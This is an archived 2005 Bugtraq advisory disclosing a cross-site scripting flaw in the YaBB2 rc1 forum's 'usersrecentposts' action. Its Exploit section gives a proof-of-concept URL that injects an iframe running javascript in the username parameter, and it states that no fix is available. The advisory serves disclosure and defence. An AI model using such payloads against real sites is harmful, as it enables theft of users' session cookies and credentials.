lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050313135003.22402.qmail@www.securityfocus.com>
Date: 13 Mar 2005 13:50:03 -0000
From: alireza hassani <trueend5@...oo.com>
To: bugtraq@...urityfocus.com
Subject: YaBB2 rc1 XSS




[PersianHacker.NET 200503-08] YaBB2 rc1 XSS
Vulnerability
Date: 2005 March
Bug Number: 08
bid:12756 

 
YaBB 
is a leading free forum software package that rivals
any professional message board out there. It provides
a real-time chat and support system for your visitors.
 
More info @:
http://www.yabbforum.com/
 
 
Discussion:
--------------------
XSS Vulnerability in 'usersrecentposts' that may allow
a remote user to launch cross-site
scripting attacks.
 
This issue could permit a remote attacker to create a
malicious URI link that includes
hostile HTML and script code. If this link were to be
followed, the hostile
code may be rendered in the web browser of the victim
user. This would occur in
the security context of the affected Web site and may
allow for theft of cookie-
based authentication credentials or other attacks.
 
This vulnerability is reported to exist in YaBB2 rc1,
other versions might
also be affected. 
 
Exploit:
--------------------
http://www.example.com/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>
 
 
Solution:
--------------------
no solution at this time.
 
 
Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Alireza Hassani (trueend5 yahoo com)
http://www.PersianHacker.NET
 
 
Help
--------------------
Read our whitepaper about XSS Vulnerability (only in
FARSI language):
http://www.persianhacker.net/articles/article-2322.html
visit: http://www.PersianHacker.NET
or mail me @: trueend5 yahoo com
 
& 2 iranians all around the world: Happy 4shanbesoori and Happy New Year


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ